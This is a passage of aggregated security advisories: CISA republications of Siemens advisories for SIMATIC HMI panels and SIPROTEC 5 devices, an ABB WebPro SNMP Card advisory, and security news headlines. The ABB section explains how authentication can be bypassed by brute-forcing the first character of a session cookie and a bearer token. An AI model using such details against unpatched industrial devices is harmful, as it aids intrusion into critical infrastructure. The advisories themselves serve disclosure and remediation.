CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies. CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets. Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.

Advisory Conversion Disclaimer
This ICSA is a verbatim republication of Siemens ProductCERT SSA-392349 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory.

Revision History
Initial Release Date: 2026-05-12
2026-05-12, Revision 1: Publication Date
2026-05-14, Revision 2: Initial CISA Republication of Siemens ProductCERT SSA-392349 advisory

Siemens SIMATIC

Summary

SIMATIC HMI Unified Comfort Panels before V21.0 are affected by a vulnerability that allows an unauthenticated attacker to access the web browser via the help link. This vulnerability allows an attacker to access the web browser through the Control Panel if it is not protected by the corresponding security mechanisms. This opens the possibility for the attacker to find backdoors, which might lead to unwanted misconfigurations. Siemens has released new versions for the affected products and recommends updating to the latest versions.

The following versions of Siemens SIMATIC are affected. Every product listed below is affected in versions vers:intdot/<21 (CVE-2026-27662):

SIMATIC HMI MTP1000 Unified Comfort Panel (6AV2128-3KB06-0AX1)
SIMATIC HMI MTP1000 Unified Comfort Panel hygienic (6AV2128-3KB40-0AX0)
SIMATIC HMI MTP1000 Unified Comfort Panel hygienic neutral design (6AV2128-3KB70-0AX0)
SIMATIC HMI MTP1000, Unified Comfort Panel neutral (6AV2128-3KB36-0AX1)
SIMATIC HMI MTP1200 Comfort Pro for stand (expandable, flange at the bottom) (6AV2128-3MB27-1BX0)
SIMATIC HMI MTP1200 Comfort Pro for support arm (expandable, round tube) and extension unit (6AV2128-3MB27-0BX0)
SIMATIC HMI MTP1200 Comfort Pro for support arm (not extendable, flange on top) (6AV2128-3MB27-0AX0)
SIMATIC HMI MTP1200 Comfort Pro neutral design for stand (expandable, flange at the bottom) (6AV2128-3MB57-1BX0)
SIMATIC HMI MTP1200 Comfort Pro neutral design for support arm (expandable, round tube) and extensio (6AV2128-3MB57-0BX0)
SIMATIC HMI MTP1200 Comfort Pro neutral design for support arm (not extendable, flange on top) (6AV2128-3MB57-0AX0)
SIMATIC HMI MTP1200 Unified Comfort Panel (6AV2128-3MB06-0AX1)
SIMATIC HMI MTP1200 Unified Comfort Panel hygienic (6AV2128-3MB40-0AX0)
SIMATIC HMI MTP1200 Unified Comfort Panel hygienic neutral design (6AV2128-3MB70-0AX0)
SIMATIC HMI MTP1200 Unified Comfort Panel neutral design (6AV2128-3MB36-0AX1)
SIMATIC HMI MTP1500 Comfort Pro for stand (expandable, flange at the bottom) (6AV2128-3QB27-1BX0)
SIMATIC HMI MTP1500 Comfort Pro for support arm (expandable, round tube) and extension unit (6AV2128-3QB27-0BX0)
SIMATIC HMI MTP1500 Comfort Pro for support arm (not extendable, flange on top) (6AV2128-3QB27-0AX0)
SIMATIC HMI MTP1500 Comfort Pro neutral design for stand (expandable, flange at the bottom) (6AV2128-3QB57-1BX0)
SIMATIC HMI MTP1500 Comfort Pro neutral design for support arm (expandable, round tube) and extensio (6AV2128-3QB57-0BX0)
SIMATIC HMI MTP1500 Comfort Pro neutral design for support arm (not extendable, flange on top) (6AV2128-3QB57-0AX0)
SIMATIC HMI MTP1500 Unified Comfort Panel (6AV2128-3QB06-0AX1)
SIMATIC HMI MTP1500 Unified Comfort Panel hygienic (6AV2128-3QB40-0AX0)
SIMATIC HMI MTP1500 Unified Comfort Panel hygienic neutral design (6AV2128-3QB70-0AX0)
SIMATIC HMI MTP1500 Unified Comfort Panel neutral design (6AV2128-3QB36-0AX1)
SIMATIC HMI MTP1900 Comfort Pro for stand (expandable, flange at the bottom) (6AV2128-3UB27-1BX0)
SIMATIC HMI MTP1900 Comfort Pro for support arm (expandable, round tube) and extension unit (6AV2128-3UB27-0BX0)
SIMATIC HMI MTP1900 Comfort Pro for support arm (not extendable, flange on top) (6AV2128-3UB27-0AX0)
SIMATIC HMI MTP1900 Comfort Pro neutral design for stand (expandable, flange at the bottom) (6AV2128-3UB57-1BX0)
SIMATIC HMI MTP1900 Comfort Pro neutral design for support arm (expandable, round tube) and extensio (6AV2128-3UB57-0BX0)
SIMATIC HMI MTP1900 Comfort Pro neutral design for support arm (not extendable, flange on top) (6AV2128-3UB57-0AX0)
SIMATIC HMI MTP1900 Unified Comfort Panel (6AV2128-3UB06-0AX1)
SIMATIC HMI MTP1900 Unified Comfort Panel hygienic (6AV2128-3UB40-0AX0)
SIMATIC HMI MTP1900 Unified Comfort Panel hygienic neutral design (6AV2128-3UB70-0AX0)
SIMATIC HMI MTP1900 Unified Comfort Panel neutral design (6AV2128-3UB36-0AX1)
SIMATIC HMI MTP2200 Comfort Pro for stand (expandable, flange at the bottom) (6AV2128-3XB27-1BX0)
SIMATIC HMI MTP2200 Comfort Pro for support arm (expandable, round tube) and extension unit (6AV2128-3XB27-0BX0)
SIMATIC HMI MTP2200 Comfort Pro for support arm (not extendable, flange on top) (6AV2128-3XB27-0AX0)
SIMATIC HMI MTP2200 Comfort Pro neutral design for stand (expandable, flange at the bottom) (6AV2128-3XB57-1BX0)
SIMATIC HMI MTP2200 Comfort Pro neutral design for support arm (expandable, round tube) and extensio (6AV2128-3XB57-0BX0)
SIMATIC HMI MTP2200 Comfort Pro neutral design for support arm (not extendable, flange on top) (6AV2128-3XB57-0AX0)
SIMATIC HMI MTP2200 Unified Comfort Hygienic (6AV2128-3XB40-0AX0)
SIMATIC HMI MTP2200 Unified Comfort Hygienic neutral design (6AV2128-3XB70-0AX0)
SIMATIC HMI MTP2200 Unified Comfort Panel (6AV2128-3XB06-0AX1)
SIMATIC HMI MTP2200 Unified Comfort Panel neutral design (6AV2128-3XB36-0AX1)
SIMATIC HMI MTP700 Unified Comfort Panel (6AV2128-3GB06-0AX1)
SIMATIC HMI MTP700 Unified Comfort Panel hygienic neutral design (6AV2128-3GB40-0AX0)
SIMATIC HMI MTP700 Unified Comfort Panel hygienic neutral design (6AV2128-3GB70-0AX0)
SIMATIC HMI MTP700, Unified Comfort Panel neutral design (6AV2128-3GB36-0AX1)
SIPLUS HMI MTP1000 Unified Comfort (6AG1128-3KB06-4AX1)
SIPLUS HMI MTP1200 Unified Comfort (6AG1128-3MB06-4AX1)
SIPLUS HMI MTP700 Unified Comfort (6AG1128-3GB06-4AX1)

CVSS v3: 7.7
Vendor: Siemens
Equipment: Siemens SIMATIC
Vulnerabilities: Initialization of a Resource with an Insecure Default

Background

Critical Infrastructure Sectors: Critical Manufacturing
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Germany

Vulnerabilities

CVE-2026-27662: Affected devices do not properly restrict access to the web browser via the Control Panel when no corresponding security mechanisms are in place. This could allow an unauthenticated attacker to gain unauthorized access to the web browser, potentially enabling the discovery of backdoors, performing unauthorized actions, or exploiting misconfigurations that may lead to further system compromise.

Affected Products

Siemens SIMATIC
Vendor: Siemens
Product Version: all products listed above
Product Status: known_affected

Remediations

Mitigation: Compliance with the security guidelines is strongly recommended (especially chapter "3.2 Ending HMI runtime", "3.4.1 Enable access protection for the Control Panel" and "3.4.2 Changing runtime autostart"): https://support.industry.siemens.com/cs/ww/en/view/109481300
Mitigation: Disable the taskbar, which can be configured in the Control Panel > System Properties > Taskbar.
Vendor fix: Update to V21 or later version: https://support.industry.siemens.com/cs/ww/en/view/109825605/

Relevant CWE: CWE-1188 Initialization of a Resource with an Insecure Default

Metrics

CVSS Version: 3.1
Base Score: 7.7
Base Severity: HIGH
Vector String: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

Acknowledgments

Siemens ProductCERT reported this vulnerability to CISA.

General Recommendations

As a general security measure, Siemens strongly recommends protecting network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends configuring the environment according to Siemens' operational guidelines for Industrial Security (Download: https://www.siemens.com/cert/operational-guidelines-industrial-security), and following the recommendations in the product manuals. Additional information on Industrial Security by Siemens can be found at: https://www.siemens.com/industrialsecurity

Additional Resources

For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories

Terms of Use

The use of Siemens Security Advisories is subject to the terms and conditions listed on: https://www.siemens.com/productcert/terms-of-use.

Advisory Conversion Disclaimer

This ICSA is a verbatim republication of Siemens ProductCERT SSA-387223 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory.

Revision History

Initial Release Date: 2026-05-12

Date        Revision  Summary
2026-05-12  1         Publication Date
2026-05-14  2         Initial CISA Republication of Siemens ProductCERT SSA-387223 advisory

Siemens SIPROTEC 5

Summary

The SIPROTEC 5 devices do not use sufficiently random numbers to generate session identifiers. This could facilitate a brute-force attack against a valid session identifier, which could allow an unauthenticated remote attacker to hijack a valid user session. The affected session identifiers are only used in a subset of the endpoints that are provided by the affected products. Siemens is preparing fix versions and recommends countermeasures for products where fixes are not, or not yet, available.

The following versions of Siemens SIPROTEC 5 are affected:

SIPROTEC 5 6MD84 (CP300): vers:intdot/<11.0 (CVE-2024-54017)
SIPROTEC 5 6MD85 (CP200): vers:all/* (no CVE listed)
SIPROTEC 5 6MD85 (CP300): vers:intdot/>=7.80|<11.0 (CVE-2024-54017)
SIPROTEC 5 6MD86 (CP200): vers:all/* (no CVE listed)
SIPROTEC 5 6MD86 (CP300): vers:intdot/>=7.80|<11.0 (CVE-2024-54017)
SIPROTEC 5 6MD89 (CP300): vers:intdot/>=7.80|<11.0 (CVE-2024-54017)
SIPROTEC 5 6MU85 (CP300): vers:intdot/>=7.80|<11.0 (CVE-2024-54017)
SIPROTEC 5 7KE85 (CP200): vers:all/* (no CVE listed)
SIPROTEC 5 7KE85 (CP300): vers:intdot/>=7.80|<11.0 (CVE-2024-54017)
SIPROTEC 5 7SA82 (CP100): vers:intdot/>=7.80 (CVE-2024-54017)
SIPROTEC 5 7SA82 (CP150): vers:intdot/<11.0 (CVE-2024-54017)
SIPROTEC 5 7SA84 (CP200): vers:all/* (no CVE listed)
SIPROTEC 5 7SA86 (CP200): vers:all/* (no CVE listed)
SIPROTEC 5 7SA86 (CP300): vers:intdot/>=7.80|<11.0 (CVE-2024-54017)
SIPROTEC 5 7SA87 (CP200): vers:all/* (no CVE listed)
SIPROTEC 5 7SA87 (CP300): vers:intdot/>=7.80|<11.0 (CVE-2024-54017)
SIPROTEC 5 7SD82 (CP100): vers:intdot/>=7.80 (CVE-2024-54017)
SIPROTEC 5 7SD82 (CP150): vers:intdot/<11.0 (CVE-2024-54017)
SIPROTEC 5 7SD84 (CP200): vers:all/* (no CVE listed)
SIPROTEC 5 7SD86 (CP200): vers:all/* (no CVE listed)
SIPROTEC 5 7SD86 (CP300): vers:intdot/>=7.80|<11.0 (CVE-2024-54017)
SIPROTEC 5 7SD87 (CP200): vers:all/* (no CVE listed)
SIPROTEC 5 7SD87 (CP300): vers:intdot/>=7.80|<11.0 (CVE-2024-54017)
SIPROTEC 5 7SJ81 (CP100): vers:intdot/>=7.80 (CVE-2024-54017)
SIPROTEC 5 7SJ81 (CP150): vers:intdot/<11.0 (CVE-2024-54017)
SIPROTEC 5 7SJ82 (CP100): vers:intdot/>=7.80 (CVE-2024-54017)
SIPROTEC 5 7SJ82 (CP150): vers:intdot/<11.0 (CVE-2024-54017)
SIPROTEC 5 7SJ85 (CP200): vers:all/* (no CVE listed)
SIPROTEC 5 7SJ85 (CP300): vers:intdot/>=7.80|<11.0 (CVE-2024-54017)
SIPROTEC 5 7SJ86 (CP200): vers:all/* (no CVE listed)
SIPROTEC 5 7SJ86 (CP300): vers:intdot/>=7.80|<11.0 (CVE-2024-54017)
SIPROTEC 5 7SK82 (CP100): vers:intdot/>=7.80 (CVE-2024-54017)
SIPROTEC 5 7SK82 (CP150): vers:intdot/<11.0 (CVE-2024-54017)
SIPROTEC 5 7SK85 (CP200): vers:all/* (no CVE listed)
SIPROTEC 5 7SK85 (CP300): vers:intdot/>=7.80|<11.0 (CVE-2024-54017)
SIPROTEC 5 7SL82 (CP100): vers:intdot/>=7.80 (CVE-2024-54017)
SIPROTEC 5 7SL82 (CP150): vers:intdot/<11.0 (CVE-2024-54017)
SIPROTEC 5 7SL86 (CP200): vers:all/* (no CVE listed)
SIPROTEC 5 7SL86 (CP300): vers:intdot/>=7.80|<11.0 (CVE-2024-54017)
SIPROTEC 5 7SL87 (CP200): vers:all/* (no CVE listed)
SIPROTEC 5 7SL87 (CP300): vers:intdot/>=7.80|<11.0 (CVE-2024-54017)
SIPROTEC 5 7SS85 (CP200): vers:all/* (no CVE listed)
SIPROTEC 5 7SS85 (CP300): vers:intdot/>=7.80|<11.0 (CVE-2024-54017)
SIPROTEC 5 7ST85 (CP200): vers:all/* (no CVE listed)
SIPROTEC 5 7ST85 (CP300): vers:intdot/>=7.80|<11.0 (CVE-2024-54017)
SIPROTEC 5 7ST86 (CP300): vers:intdot/<11.0 (CVE-2024-54017)
SIPROTEC 5 7SX82 (CP150): vers:intdot/<11.0 (CVE-2024-54017)
SIPROTEC 5 7SX85 (CP300): vers:intdot/<11.0 (CVE-2024-54017)
SIPROTEC 5 7SY82 (CP150): vers:intdot/<11.0 (CVE-2024-54017)
SIPROTEC 5 7UM85 (CP300): vers:intdot/>=7.80|<11.0 (CVE-2024-54017)
SIPROTEC 5 7UT82 (CP100): vers:intdot/>=7.80 (CVE-2024-54017)
SIPROTEC 5 7UT82 (CP150): vers:intdot/<11.0 (CVE-2024-54017)
SIPROTEC 5 7UT85 (CP200): vers:all/* (no CVE listed)
SIPROTEC 5 7UT85 (CP300): vers:intdot/>=7.80|<11.0 (CVE-2024-54017)
SIPROTEC 5 7UT86 (CP200): vers:all/* (no CVE listed)
SIPROTEC 5 7UT86 (CP300): vers:intdot/>=7.80|<11.0 (CVE-2024-54017)
SIPROTEC 5 7UT87 (CP200): vers:all/* (no CVE listed)
SIPROTEC 5 7UT87 (CP300): vers:intdot/>=7.80|<11.0 (CVE-2024-54017)
SIPROTEC 5 7VE85 (CP300): vers:intdot/>=7.80|<11.0 (CVE-2024-54017)
SIPROTEC 5 7VK87 (CP200): vers:all/* (no CVE listed)
SIPROTEC 5 7VK87 (CP300): vers:intdot/>=7.80|<11.0 (CVE-2024-54017)
SIPROTEC 5 7VU85 (CP300): vers:intdot/<11.0 (CVE-2024-54017)
SIPROTEC 5 Compact 7SX800 (CP050): vers:intdot/<11.0 (CVE-2024-54017)

CVSS v3: 5.3
Vendor: Siemens
Equipment: Siemens SIPROTEC 5
Vulnerabilities: Small Space of Random Values

Background

Critical Infrastructure Sectors: Critical Manufacturing
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Germany

Vulnerabilities

CVE-2024-54017: Affected devices do not use sufficiently random values to create session identifiers. This could allow an unauthenticated remote attacker to brute force a session identifier and gain read access to limited information from the web server without authorization.

Affected Products

Siemens SIPROTEC 5
Vendor: Siemens
Product Version: SIPROTEC 5 6MD84 (CP300), SIPROTEC 5 6MD85 (CP300), SIPROTEC 5 6MD86 (CP300), SIPROTEC 5 6MD89 (CP300), SIPROTEC 5 6MU85 (CP300), SIPROTEC 5 7KE85 (CP300), SIPROTEC 5 7SA82 (CP100), SIPROTEC 5 7SA82 (CP150), SIPROTEC 5 7SA86 (CP300), SIPROTEC 5 7SA87 (CP300), SIPROTEC 5 7SD82 (CP100), SIPROTEC 5 7SD82 (CP150), SIPROTEC 5 7SD86 (CP300), SIPROTEC 5 7SD87 (CP300), SIPROTEC 5 7SJ81 (CP100), SIPROTEC 5 7SJ81 (CP150), SIPROTEC 5 7SJ82 (CP100), SIPROTEC 5 7SJ82 (CP150), SIPROTEC 5 7SJ85 (CP300), SIPROTEC 5 7SJ86 (CP300), SIPROTEC 5 7SK82 (CP100), SIPROTEC 5 7SK82 (CP150), SIPROTEC 5 7SK85 (CP300), SIPROTEC 5 7SL82 (CP100), SIPROTEC 5 7SL82 (CP150), SIPROTEC 5 7SL86 (CP300), SIPROTEC 5 7SL87 (CP300), SIPROTEC 5 7SS85 (CP300), SIPROTEC 5 7ST85 (CP300), SIPROTEC 5 7ST86 (CP300), SIPROTEC 5 7SX82 (CP150), SIPROTEC 5 7SX85 (CP300), SIPROTEC 5 7SY82 (CP150), SIPROTEC 5 7UM85 (CP300), SIPROTEC 5 7UT82 (CP100), SIPROTEC 5 7UT82 (CP150), SIPROTEC 5 7UT85 (CP300), SIPROTEC 5 7UT86 (CP300), SIPROTEC 5 7UT87 (CP300), SIPROTEC 5 7VE85 (CP300), SIPROTEC 5 7VK87 (CP300), SIPROTEC 5 7VU85 (CP300), SIPROTEC 5 Compact 7SX800 (CP050)
Product Status: known_affected, known_not_affected

Remediations

None available: Currently no fix is available
Vendor fix: Update to V11.0 or later version: https://support.industry.siemens.com/cs/ww/en/view/109814150/
Vendor fix: Update to V11.0 or later version: https://support.industry.siemens.com/cs/ww/en/view/109757433/
Vendor fix: Update to V11.0 or later version: https://support.industry.siemens.com/cs/ww/en/view/109796884/

Relevant CWE: CWE-334 Small Space of Random Values

Metrics

CVSS Version: 3.1
Base Score: 5.3
Base Severity: MEDIUM
Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Acknowledgments

Siemens ProductCERT reported this vulnerability to CISA. SEC Consult Vulnerability Lab reported this vulnerability to Siemens.

General Recommendations

Operators of critical power systems (e.g. TSOs or DSOs) worldwide are usually required by regulations to build resilience into the power grids by applying multi-level redundant secondary protection schemes. It is therefore recommended that the operators check whether appropriate resilient protection measures are in place. The risk of cyber incidents impacting the grid's reliability can thus be minimized by virtue of the grid design.

Siemens strongly recommends applying the provided security updates using the corresponding tooling and documented procedures made available with the product. If supported by the product, an automated means to apply the security updates across multiple product instances may be used. Siemens strongly recommends prior validation of any security update before it is applied, and supervision by trained staff of the update process in the target environment.

As a general security measure, Siemens strongly recommends protecting network access with appropriate mechanisms (e.g. firewalls, segmentation, VPN). It is advised to configure the environment according to our operational guidelines in order to run the devices in a protected IT environment. Recommended security guidelines can be found at: https://www.siemens.com/gridsecurity

Additional Resources

For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories

Terms of Use

The use of Siemens Security Advisories is subject to the terms and conditions listed on: https://www.siemens.com/productcert/terms-of-use.

Advisory Conversion Disclaimer

This ICSA is a verbatim republication of Siemens ProductCERT SSA-786884 from a direct conversion of the vendor's Common Security Advisory Framework (CSAF) advisory. This is republished to CISA's website as a means of increasing visibility and is provided "as-is" for informational purposes only. CISA is not responsible for the editorial or technical accuracy of republished advisories and provides no warranties of any kind regarding any information contained within this advisory. Further, CISA does not endorse any commercial product or service. Please contact Siemens ProductCERT directly for any questions regarding this advisory.

Revision History

Initial Release Date: 2026-05-12

Date        Revision  Summary
2026-05-12  1         Publication Date
2026-05-14  2         Initial CISA Republication of Siemens ProductCERT SSA-786884 advisory

New Fragnesia Linux flaw lets attackers gain root privileges

Linux distros are rolling out patches for a new high-severity kernel privilege escalation vulnerability (known as Fragnasia and tracked as CVE-2026-46300) that allows attackers to run malicious code as root. [...]

West Pharmaceutical says hackers stole data, encrypted systems

West Pharmaceutical Services disclosed that it was the target of a cyberattack that resulted in data exfiltration and system encryption. [...]

Iranian hackers targeted major South Korean electronics maker

The Iran-linked hacking group MuddyWater (a.k.a. Seedworm, Static Kitten) launched a broad cyber-espionage campaign targeting at least nine high-profile organizations across multiple sectors and countries. [...]

Attackers Weaponize RubyGems for Data Dead Drops

Threat actors are publishing RubyGems packages that include scrapers targeting public-facing UK government servers, but with no clear objective.

Tables Turn on 'The Gentlemen' RaaS Gang With Data Leak

An OPSEC failure provides a window into what helped the ransomware group rise: a generous affiliate model, opportunistic TTPs, and an effective organizational structure.

New critical Exim mailer flaw allows remote code execution

A critical vulnerability affecting certain configurations of the Exim open-source mail transfer agent could be exploited by an unauthenticated remote attacker to execute arbitrary code. [...]

This is what some of the world’s largest banks of malware look like stacked as hard drives

What would some of the world's largest repositories of malware look like if they were stacked as hard drives, one on top of the other?

Windows BitLocker zero-day gives access to protected drives, PoC released

A cybersecurity researcher has published proof-of-concept (PoC) exploits for two unpatched Microsoft Windows vulnerabilities named YellowKey and GreenPlasma, which are a BitLocker bypass and a privilege-escalation flaw. [...]

Webinar tomorrow: Why security alone won't stop modern attacks

Tomorrow's webinar examines why prevention alone is no longer enough against modern cyberattacks. The session explores how organizations combine security, backups, and recovery planning to improve cyber resilience after attacks. [...]

China's 'FamousSparrow' APT Nests in South Caucasus Energy Firm

The cyberthreat group targets an Azerbaijani oil and gas firm with repeated attacks, as the China-linked actors extend targeting beyond hospitality, telecom, and government sectors.

LatAm Vibe Hackers Generate Custom Hacking Tools on the Fly

In the latest evolution of automated cyberattacks, threat actors heavily leveraged AI agents to support campaigns against entities in Mexico and Brazil.

Otto-Support - Supply Chain Risks in MCP Servers

What if the MCP server itself is the attacker? Supply chain risk in MCP tools is structural, and the postmark-mcp and ClawHub compromises made it concrete. This post pairs those case studies with otto-support's selfpwn module to show exactly what a hostile MCP server can access the moment it runs.

Foxconn confirms cyberattack claimed by Nitrogen ransomware gang

Foxconn, the world's largest electronics manufacturer, says some of its North American factories are now working to resume normal operations after a cyberattack. [...]

73 Seconds to Breach, 24 Hours to Patch: The Case for Autonomous Validation

Attackers can compromise systems in minutes while patching and response still take hours or days. Picus Security breaks down why autonomous validation is becoming critical for modern defense strategies. [...]

Multiple Vulnerabilities in Fortinet Products Could Allow for Remote Code Execution

Multiple vulnerabilities have been discovered in Fortinet products, the most severe of which could allow for remote code execution.

* FortiAuthenticator is a centralized identity and access management (IAM) solution that secures network access by managing user identities, Multi-Factor Authentication (MFA), and certificate management.
* FortiSandbox is an advanced threat detection solution from Fortinet that uses sandboxing to analyze suspicious files and network traffic for advanced threats like zero-day malware and ransomware.

Successful exploitation of these vulnerabilities could lead to remote code execution. Depending on the privileges associated with the user, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer rights on the system could be less impacted than those who operate with administrative user rights.

0
Critical Patches Issued for Microsoft Products, May 12, 2026

Multiple vulnerabilities have been discovered in Microsoft products, the most severe of which could allow for remote code execution. Successful exploitation of the most severe of these vulnerabilities could result in an attacker gaining the same privileges as the logged-on user. Depending on the privileges associated with the user, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

0
Multiple Vulnerabilities in Apple Products Could Allow for Arbitrary Code Execution

Multiple vulnerabilities have been discovered in Apple products, the most severe of which could allow for arbitrary code execution. Successful exploitation of the most severe of these vulnerabilities could allow for arbitrary code execution. Depending on the privileges associated with the user, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

0
Multiple Vulnerabilities in Adobe Products Could Allow for Arbitrary Code Execution

Multiple vulnerabilities have been discovered in Adobe products, the most severe of which could allow for arbitrary code execution. Adobe After Effects is a digital effects, motion graphics, and compositing application. Adobe Commerce is a composable ecommerce solution that lets you quickly create global, multi-brand B2C and B2B experiences all from one cloud-native platform. Adobe Connect is a secure, highly customizable web conferencing and virtual training platform used for webinars, online meetings, and e-learning. Adobe Media Encoder is a transcoding and rendering application that lets you deliver audio and video files in a broad variety of formats. Adobe Premiere Pro is a subscription-based timeline video editing software for film, TV, and web. Adobe Substance 3D is a suite of tools for creating 3D content, including modeling, texturing, and rendering. Content Authenticity SDK contains Rust and JavaScript libraries, enabling web pages to read, validate, create, and sign manifest data, and embed it in supported asset files. Adobe Illustrator is vector graphics software used by designers to create scalable, high-resolution artwork such as logos, icons, illustrations, and typography. Successful exploitation of the most severe of these vulnerabilities could allow for arbitrary code execution in the context of the logged-on user. Depending on the privileges associated with the user, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

0
Introducing Joro: Using AI to Build Security Tooling

Bishop Fox is releasing Joro, a collaborative web exploitation framework built almost entirely with AI. From intercepting proxy to C2 integration, this post covers how it was built, what it does, and what AI-assisted security tool development actually looks like in practice.

0
ABB WebPro SNMP Card PowerValue Multiple Vulnerabilities

Summary

ABB became aware of multiple internally discovered vulnerabilities in the WebPro SNMP card PowerValue for the product versions listed as affected in the advisory. Depending on the vulnerability, an attacker with access to the local network who successfully exploited it could achieve:

- Unauthorized access
- Insufficient session expiration leading to resource unavailability
- Uncontrolled resource consumption leading to a DoS attack

ABB strongly advises customers to update affected products to the latest firmware.

The following versions of ABB WebPro SNMP Card PowerValue are affected: WebPro SNMP Card <=1.1.8.k, 1.1.8.p

CVSS v3: 8.8
Vendor: ABB
Equipment: ABB WebPro SNMP Card PowerValue
Vulnerabilities: Improper Check for Unusual or Exceptional Conditions, Incorrect Implementation of Authentication Algorithm, Insufficient Session Expiration

Background

Critical Infrastructure Sectors: Chemical, Communications, Critical Manufacturing, Dams, Energy, Healthcare and Public Health, Information Technology, Water and Wastewater
Countries/Areas Deployed: Worldwide
Company Headquarters Location: Switzerland

Vulnerabilities

CVE-2025-4675
The Modbus (slave) protocol was implemented incorrectly in the device: port 502 becomes unstable and the Modbus service is unavailable until a manual reboot of the device.
Affected products: ABB WebPro SNMP Card PowerValue <=1.1.8.k (product status: fixed, known_affected)
Relevant CWE: CWE-754 Improper Check for Unusual or Exceptional Conditions
Metrics: CVSS v3.1 base score 6.5 (MEDIUM), vector string CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:F/RL:O/RC:U

CVE-2025-4676
The device web HMI authenticates a user by validating only the first character of the session cookie and of the authentication token, so a user is validated as long as the first character of each is correct. An attacker can easily brute force the first character of both the session cookie and the bearer token. This vulnerability allows an attacker to easily bypass the authentication implemented on the device.
Affected products: ABB WebPro SNMP Card PowerValue <=1.1.8.k (product status: fixed, known_affected)
Relevant CWE: CWE-303 Incorrect Implementation of Authentication Algorithm
Metrics: CVSS v3.1 base score 8.8 (HIGH), vector string CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H/E:F/RL:O/RC:U

CVE-2025-4677
No idle session timeout is configured for ports 23 and 502 on the device. An attacker can therefore open a number of connections to the device and, since the device does not destroy them, cause the device's resources to become unavailable.
Affected products: ABB WebPro SNMP Card PowerValue <=1.1.8.k (product status: fixed, known_affected)
Relevant CWE: CWE-613 Insufficient Session Expiration
Metrics: CVSS v3.1 base score 6.5 (MEDIUM), vector string CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:F/RL:O/RC:U

Remediations (stated identically for each of the three CVEs)

Vendor fix: The problem is corrected in WebPro SNMP card PowerValue version 1.1.8.p. ABB advises users of the affected product versions to reach out to ABB Digital Service Support (ch.ups.digital@abb.com) for guidance and recommended actions. Additionally, ABB recommends implementing defensive measures to reduce the risk of vulnerability exploitation, as outlined in the product instruction manual. Please refer to the section “Mitigation factors” for more information.

Mitigation: Mitigating factors describe conditions and circumstances that make an attack that exploits the vulnerability difficult or less likely to succeed. If a customer cannot upgrade the firmware, or an upgrade is not feasible, immediately apply the mitigating factors listed in “General security recommendations”.

Acknowledgments

ABB PSIRT reported these vulnerabilities to CISA.

Notice

The information in this document is subject to change without notice, and should not be construed as a commitment by ABB. ABB provides no warranty, express or implied, including warranties of merchantability and fitness for a particular purpose, for the information contained in this document, and assumes no responsibility for any errors that may appear in this document. In no event shall ABB or any of its suppliers be liable for direct, indirect, special, incidental or consequential damages of any nature or kind arising from the use of this document, or from the use of any hardware or software described in this document, even if ABB or its suppliers have been advised of the possibility of such damages. This document and parts hereof must not be reproduced or copied without written permission from ABB, and the contents hereof must not be imparted to a third party nor used for any unauthorized purpose. All rights to registrations and trademarks reside with their respective owners.

Frequently Asked Questions

What causes the vulnerability?
The vulnerabilities are caused by code defects that allow the attacker to perform various unintended, unauthorized actions on the target device. Please look at the description of the respective vulnerabilities in section “Vulnerability severity and details” for further details.

What is WebPro SNMP Card PowerValue?
The WebPro SNMP Card PowerValue provides a web server to monitor and manage multiple UPS products in a networked environment. It can detect temperature and humidity for the environment by connecting to an EMD (Environmental Monitoring Device). It can not only prevent data loss from a power outage and safely shut down systems, but also store programming data and schedule UPS shutdowns. All UPS warning and fault event records can be kept in the WebPro SNMP Card PowerValue.

What might an attacker use the vulnerability to do?
If the mentioned vulnerabilities were successfully exploited by an attacker, this could allow the attacker to take control of the target WebPro SNMP Card PowerValue device.

How could an attacker exploit the vulnerability?
An attacker could try to exploit the vulnerability by creating a specially crafted message and sending it to the WebPro SNMP Card PowerValue device. This would require that the attacker has access to the system network, by connecting to the network either directly or through a wrongly configured or penetrated security system.

Could the vulnerability be exploited remotely?
